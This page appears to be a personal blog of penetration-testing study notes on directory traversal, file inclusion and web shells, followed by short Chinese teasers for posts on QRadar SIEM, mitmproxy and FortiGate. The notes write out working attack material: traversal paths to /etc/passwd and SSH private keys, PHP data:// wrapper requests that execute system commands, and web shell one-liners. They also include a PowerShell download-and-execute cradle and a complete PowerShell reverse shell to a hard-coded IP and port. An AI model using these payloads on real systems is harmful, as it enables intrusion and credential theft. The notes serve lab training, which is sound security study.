Directory Traversal Enumerate Users ../../../../../../../../../../../../../etc/passwd Read SSH Private Keys ../../../../../../../../../../../../../home/offsec/.ssh/id_rsa ProtectionEvasionRemoval of path traversal characters: ../1. Use ..../////, which becomes ../ after sanitization2. URL encodeApproved pathGo to the approved path, then go backAppend extension in the backend File Inclusion Local File Inclusion (LFI) Identity a local file on the server where we can add source code to it (e.g. web application log file) Insert payload code into the local file (log poisoning) Exploit local file inclusion vulnerability to execute that file Log path of Linux: ../../../../../../../../../var/log/apache2/access.log Log path of Windows (XAMPP): C:\xampp\apache\logs\access.log Use of PHP Wrapper php://filter The php://filter wrapper makes the application to include the contents of the file only without execution. curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php data:// The data:// wrapper makes the application to intepret the included contents as source code. curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>" echo -n '<?php echo system($_GET["cmd"]);?>' | base64 curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" Remote File Inclusion (RFI) Host a web server on the attacker machine to serve the remote file to be inluded Make a request to the target web application to connect to the…

Web Shell Upload Web Shell Check the programming language of the web app: enumerating common index page extensions, Wappalyzer Write a basic web shell payload in that programming language to check if there is any validation, for example: <?php file_get_contents('/etc/passwd'); ?> <?php system('hostname'); ?> <?php system($_REQUEST['cmd']); ?> <% eval request('cmd') %> Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX) Reverse Web Shell Main idea: use web shell to initiate a remote session from the target machine to the pentester's machine, thus enable interactive terminal to the target machine. Tools for opening a reverse web shell: php-reverse-shell Generate a reverse shell with msfvenom: msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Reverse shell for Windows: Powershell command to execute remote script: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')" Contents of backdoor.ps1: $client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Command…

使用QRadar SIEM及JumpServer实现自动化响应特权访问管理（PAM）的安全事件，例如中断会话或禁用PAM登录。

通过互联网基础知识，分析美国执法机构查封网站的技术实现方法。

在VMware虚拟机上安装FortiGate防火墙永久使用版，并且在防火墙后设置一个拥有简单访问控制的虚拟局域网。

在实现用mitmproxy和QRadar SIEM审计员工浏览记录之后，我们继续探索mitmproxy开源web代理在防止信息泄露，恶意网站威胁，以及员工行为合规中的应用。通过编写mitmproxy脚本，实现对黑名单网站/IP地址进行封锁，并将事件上报QRadar SIEM分析。

IBM Security从24年开始不再提供QRadar SIEM Community Edition的OVA虚拟机一键导入文件，只有ISO镜像，因此在VMware虚拟机部署QRadar服务端变得麻烦了点。本人安装的时候遇到了一些问题，重装了几次。这篇博客整理下IBM官方论坛以及Reddit上的一些零散信息，详细记录一个安装好QRadar的完整流程。

QRadar SIEM Community Edition免费授权续期步骤

一种机读防倒票、验证客户信息，同时识别高端客户完成会籍匹配的方法。

这一站，上岸！